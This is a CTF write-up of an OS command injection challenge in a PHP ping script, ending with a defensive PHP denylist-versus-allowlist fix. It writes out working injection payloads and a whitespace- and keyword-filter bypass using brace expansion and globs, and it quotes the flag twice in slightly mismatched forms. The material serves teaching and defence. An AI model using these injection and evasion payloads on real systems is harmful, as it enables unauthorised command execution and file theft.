ICMTC CTF 2023 — International Competition of the Military Technical College

Jun 13, 2024


Ping Me — OS Command Injection

The PHP script utilizes bash to ping hosts.
At first glance, it appears to be vulnerable to OS Command Injection.

1. Testing a Simple Command Injection
Injected command: ;ls
Server response: index.php
Result: Command injection successful, confirming the vulnerability.

2. Attempting to Read the File /flag
Injected command: ;cat /flag
Server response: Flag is forbidden to read!
Result: Access to the flag is restricted.

3. Detection of Forbidden Words
After multiple tests, it was observed that any input containing the word ‘flag’ triggered the server response: Flag is forbidden to read!
Input containing the characters &, $, \, or whitespace was also rejected, detected by the server as a hack.

4. Evading Detection
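To bypass detection, the injection was modified as follows: ;{cat,/f*l*a*g}
Note: ;{cat,/f*l*a*g} and ;{cat,/flag} are equivalent. Bash brace expansion turns {cat,/flag} into cat /flag, so the input needs no whitespace, and the glob /f*l*a*g matches /flag without the input containing the word ‘flag’.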

5. Executing the File
Executed command: ;/f*l*a*g
Server response: Congratulations, this is the flag location: /tmp/flag_FXLNYL.txt
Result: Successfully located the flag file.

6. Reading the Flag
Injected command: ;{cat,/tmp/f*l*a*g_FXLNYL.txt}
Server response: EGCERT{3x3cut3_703503_c0Mm@nD$W!th0ut$p@c3s}
Flag obtained: EGCERT{3x3cut3_703503_c0Mm@nD$_W!th0ut_$p@c3s}
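Why the filter in steps 3 and 4 failed, and what a fix looks like, as an added example (hypothetical code, not the challenge's source): denylist_ok() is a reconstruction of the observed filter, while allowlist_ok() and ping_host() are assumed names for a hardened handler that validates the host and runs ping without a shell.

```php
<?php
// Added example: hypothetical code, not the challenge's source.

// Denylist reconstructed from the behaviour the write-up observed (assumption).
function denylist_ok(string $host): bool
{
    return stripos($host, 'flag') === false
        && preg_match('/[&$\\\\\s]/', $host) === 0;
}

// Allowlist: only an IP literal or a syntactically valid hostname passes.
function allowlist_ok(string $host): bool
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return strlen($host) <= 253
        && preg_match('/^' . $label . '(?:\.' . $label . ')*\z/', $host) === 1;
}

// Hardened ping: validate first, then pass an argv array to proc_open
// (PHP 7.4+) so no shell is spawned and ; { } * are never interpreted.
function ping_host(string $host): string
{
    if (!allowlist_ok($host)) {
        throw new InvalidArgumentException('invalid host');
    }
    $proc = proc_open(['ping', '-c', '1', $host], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start ping');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out;
}

// Constructed sample: a benign host plus the inputs quoted in the write-up.
foreach (['8.8.8.8', ';ls', ';cat /flag', ';{cat,/f*l*a*g}'] as $in) {
    printf("%-18s denylist=%-6s allowlist=%s\n", $in,
        denylist_ok($in) ? 'pass' : 'block',
        allowlist_ok($in) ? 'pass' : 'block');
}
```

The denylist lets ;ls and ;{cat,/f*l*a*g} through and blocks only ;cat /flag, while the allowlist accepts nothing but 8.8.8.8.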